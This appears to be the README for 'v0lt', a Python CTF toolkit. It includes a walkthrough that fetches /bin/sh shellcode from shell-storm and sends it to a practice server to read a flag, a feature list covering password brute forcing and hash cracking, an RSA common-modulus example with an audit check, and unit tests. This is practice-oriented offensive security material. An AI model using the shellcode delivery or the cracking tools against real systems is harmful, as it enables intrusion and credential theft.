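v0lt security toolkit, CTF
0×01 v0lt
v0lt is my attempt to regroup every security CTF tool, written in Python, that I have used, am using, or will need in the future. Practice tasks can often be solved with bash scripts, but I find Python more flexible, which is why I made this choice. It has nothing to do with pwntools, developed by the Dutch CTF team Gallopsled; v0lt is just a small, flexible toolkit that nonetheless has a few special features.
0×01 Requirements and installation
Dependencies: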
Libmagic
Python3
BeautifulSoup
Requests
filemagic
hexdump
passlib
Installation:
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # needing to run this with sudo means dependencies may be missing
Example: Shellcodes
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected To port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)
......
90: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 56 bytes
87: Linux/x86:execve (/bin/sh) - 21 Bytes
83: Linux/x86:break chroot execve /bin/sh - 80 bytes
66: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
......
Selection: 87
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"
>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
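Implemented features:
Cryptography:
- Base64
- Caesar shift
- Hash functions (SHA, MD5)
- Bitwise operations (XOR, inverse XOR)
- Common conversions (bytes, strings, hex)
- RSA basic modules (modular inverse, inverse power, egcd script for the RSA common modulus attack…)
- Brute force (from a dictionary, custom words)
Shellcodes:
- Select and download shellcodes from the repo on Shell-storm, Jonathan Salwan's personal website
- Shellcode formats
- Shell{cat,net}: send shellcodes easily
- Automatic padding
Connection support:
- Netcat
- Telnet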
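The egcd item in the list above refers to the RSA common modulus weakness: when the same message is encrypted under two public keys that share n and have coprime exponents, it can be recovered without any private key, which is why key generation must never reuse a modulus. The code below is an added example, not v0lt's own code; the function names, the toy primes and the key names are constructed for illustration.

```python
# Added example (not v0lt code). Toy parameters, constructed for illustration.

def egcd(a, b):
    """Extended Euclid: return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def common_modulus_recover(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 mod n and c2 = m^e2 mod n when gcd(e1, e2) == 1."""
    g, a, b = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents are not coprime, so a*e1 + b*e2 = 1 has no solution")
    # With a negative exponent, pow() inverts the base mod n first (Python 3.8+)
    # and raises ValueError if the ciphertext shares a factor with n.
    return (pow(c1, a, n) * pow(c2, b, n)) % n


def find_shared_moduli(keys):
    """Defensive audit: map each modulus used by more than one key to the key names."""
    by_n = {}
    for name, (n, _e) in keys.items():
        by_n.setdefault(n, []).append(name)
    return {n: names for n, names in by_n.items() if len(names) > 1}


def demo():
    p, q = 2**31 - 1, 2**61 - 1      # constructed toy primes, far too small for real keys
    n = p * q
    keys = {"alice": (n, 65537), "bob": (n, 17)}   # constructed: same n, different e
    m = int.from_bytes(b"v0lt", "big")             # constructed message, smaller than p
    c1, c2 = pow(m, 65537, n), pow(m, 17, n)
    recovered = common_modulus_recover(n, 65537, c1, 17, c2)
    return find_shared_moduli(keys), recovered.to_bytes(4, "big")


if __name__ == "__main__":
    print(demo())
```

Running `find_shared_moduli` over an inventory of public keys is the corresponding check: any modulus it reports should be treated as compromised and the keys regenerated.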
More examples available:
import unittest
from v0lt import *

__author__ = 'P1kachu'


class Tests(unittest.TestCase):
    # The Netcat and Telnet tests need network access to the author's test host.
    def test_netcat(self):
        nc = Netcat("archpichu.ddns.net", 65103)
        self.assertEqual(nc.read(), "\nNothing to display yet...\n")

    def test_telnet(self):
        tl = Telnet("archpichu.ddns.net", 65103)
        self.assertEqual(tl.read(), "\nNothing to display yet...\n")

    def test_stack(self):
        stack = Stack()
        self.assertEqual(stack.size(), 0)
        stack.push("item")
        self.assertEqual(stack.is_empty(), False)
        self.assertEqual(stack.size(), 1)
        item = stack.pop()
        self.assertEqual(stack.size(), 0)
        self.assertEqual(item, "item")
        self.assertEqual(stack.is_empty(), True)

    def test_basic_ceasar(self):
        # Offset 13; the expected output is upper case.
        plaintext = "This is a ceasar plaintext"
        encrypted = "GUVF VF N PRNFNE CYNVAGRKG"
        deciphered = basic_ceasar(plaintext, offset=13)
        self.assertEqual(encrypted, deciphered)

    def test_get_shellcode(self):
        sh = ShellHack(70, "/bin/lol")
        sh.get_shellcodes(sh.keywords)
        sh = ShellHack(70, "/bin/sh")
        sh.get_shellcodes(sh.keywords)

    def test_flag_gen(self):
        flags_gen("flags.tmp", "P1ka", 10)

    def test_find_nth(self):
        self.assertEqual(find_nth("lolilol", "l", 3), 6)
        self.assertEqual(find_nth("lolilol", "l", 4), -1)

    # Not prefixed with test_, so unittest does not collect this method.
    def brute(self):
        bf = Bruteforce(charset="abcd", final_length=5, begin_with="l", end_with="P")
        bf.generate_strings()
        bf = Bruteforce(charset="abcdef", final_length=12, begin_with="l", end_with="P")
        bf.generate_strings(output="bf.tmp")

    def test_hex(self):
        he = Hexeditor()
        he.dump_file("setup.py")
        he.save_file_as_hex("save.tmp")
        he.restore_file("test1.tmp")
        he.restore_file("test2.tmp", "save.tmp")

    def test_passwd_cracker(self):
        nix_basic_pass_cracker("HX9LLTdc/jiDE")
        nix_basic_pass_cracker("HX8LLTdc/jiDE")
        # nix_basic_pass_cracker("$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1") # n